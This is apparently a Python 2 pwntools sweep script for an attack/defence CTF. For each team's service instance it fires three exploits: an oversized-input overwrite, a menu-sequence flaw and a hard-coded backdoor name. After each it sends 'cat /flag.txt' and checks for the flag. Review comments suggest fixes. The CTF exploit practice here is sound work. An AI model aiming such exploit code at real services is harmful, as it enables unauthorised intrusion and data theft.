#! /usr/bin/env python2
# Sweep for an attack/defence CTF service: for every team instance, replay
# three known weaknesses (poc0..poc2) and report whether each one still
# yields the flag.
#
# Python 2 only: the substring tests below rely on pwntools returning `str`
# from recvuntil(); under Python 3 it returns `bytes` and those tests would
# raise TypeError.
from multiprocessing import pool
from pwn import remote, context

# Keep pwntools quiet so that only the per-team result lines are printed.
context.log_level = "error"

# Address that hosts every team's instance; teams differ only by port.
HOST = "192.168.2.20"
# Number of team instances checked by the sweep.
TOTAL_TEAMS = 10
# Marker that must appear in the received text for a check to report True.
FORMAT = "SlashRootCTF"


def poc0(host, port):
    """Check one instance for the oversized-first-input weakness.

    At the first prompt the check sends 32 filler bytes followed by nine
    more bytes (eight 0x11 and one 0x01).  If the reply contains "young" it
    walks the menu, asks for /flag.txt and looks for FORMAT in the answer.

    NOTE(review): presumably the first field is 32 bytes long and the extra
    bytes land in adjacent state; confirm against the service source.  If
    so, the service-side fix is a length-bounded read of that field.
    NOTE(review): the listing lost its indentation; the ten-fold loop is
    assumed to cover only the prompt/"99" pair.
    NOTE(review): no timeout is passed to recvuntil(), so with pwntools'
    default setting a silent instance may stall the caller.

    Args:
        host: address of the service.
        port: TCP port of the instance under test.

    Returns:
        True if the text received up to "}" contains FORMAT, False if the
        "young" marker is missing or FORMAT is not in the reply.
    """
    with remote(host, port) as p:
        p.recvuntil(">")
        filler = "A" * 32
        tail = "\x11" * 8 + "\x01"
        p.sendline(filler + tail)
        banner = p.recvuntil(">")
        # Without the marker the oversized input had no visible effect.
        if "young" not in banner:
            return False
        p.sendline("y")
        for answer in ("2", "4", "y") + ("99",) * 10:
            p.recvuntil(">")
            p.sendline(answer)
        p.sendline("cat /flag.txt")
        reply = p.recvuntil("}")
        return FORMAT in reply


def poc1(host, port):
    """Check one instance for the weakness reached via menu option 3, item 0.

    The check registers as "Leo", confirms, selects option 3 / item 0 twice
    and then reads the next prompt.  A reply containing "Who" ends the check
    with False; otherwise it walks the remaining menu, asks for /flag.txt
    and looks for FORMAT in the answer.

    NOTE(review): the listing lost its indentation.  The first loop is
    assumed to cover only the two menu selections, with the "Who" test
    after it, and the ten-fold loop only the prompt/"99" pair; confirm
    against the original file.
    NOTE(review): no timeout is passed to recvuntil(), so with pwntools'
    default setting a silent instance may stall the caller.

    Args:
        host: address of the service.
        port: TCP port of the instance under test.

    Returns:
        True if the text received up to "}" contains FORMAT, otherwise False.
    """
    with remote(host, port) as p:
        for answer in ("Leo", "y", "3", "0", "3", "0"):
            p.recvuntil(">")
            p.sendline(answer)
        # "Who" in the next prompt means the sequence was not accepted.
        if "Who" in p.recvuntil(">"):
            return False
        p.sendline("y")
        for answer in ("1", "4", "y") + ("99",) * 10:
            p.recvuntil(">")
            p.sendline(answer)
        p.sendline("cat /flag.txt")
        reply = p.recvuntil("}")
        return FORMAT in reply


def poc2(host, port):
    """Check one instance for the hard-coded special name.

    The check registers with a fixed name string, confirms, selects option 6
    and expects "Lv: 1000000" in the reply.  If it is there, it walks the
    menu, asks for /flag.txt and looks for FORMAT in the answer.

    NOTE(review): the name looks like a built-in cheat or backdoor account
    in the service; if so, the fix is to remove that special case from the
    service.  Confirm against the service source.
    NOTE(review): the listing lost its indentation; the ten-fold loop is
    assumed to cover only the prompt/"99" pair.
    NOTE(review): no timeout is passed to recvuntil(), so with pwntools'
    default setting a silent instance may stall the caller.

    Args:
        host: address of the service.
        port: TCP port of the instance under test.

    Returns:
        True if the text received up to "}" contains FORMAT, False if the
        level marker is missing or FORMAT is not in the reply.
    """
    with remote(host, port) as p:
        for answer in ("__th3_w0rLd_D3str0Y3r_15_b4ck__", "y", "6"):
            p.recvuntil(">")
            p.sendline(answer)
        status = p.recvuntil(">")
        # Without the level marker the special name was not honoured.
        if "Lv: 1000000" not in status:
            return False
        p.sendline("2")
        for answer in ("4", "y") + ("99",) * 10:
            p.recvuntil(">")
            p.sendline(answer)
        p.sendline("cat /flag.txt")
        reply = p.recvuntil("}")
        return FORMAT in reply


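if __name__ == "__main__":
    # Run the three checks against every team instance and print one result
    # line per team.  Team i listens on port 60004 + i * 100.
    checks = (poc0, poc1, poc2)
    for i in range(1, TOTAL_TEAMS + 1):
        port = 60004 + (i * 100)
        outcomes = []
        for check in checks:
            # A refused connection or an early EOF used to abort the whole
            # sweep, losing the results for all later teams.  Report the
            # failure instead, and keep it distinct from False so that
            # "could not be checked" is never read as "not vulnerable".
            try:
                outcomes.append(check(HOST, port))
            except Exception as exc:
                outcomes.append("ERR(%s)" % type(exc).__name__)
        print("Team [%s] %s %s %s" % ((i,) + tuple(outcomes)))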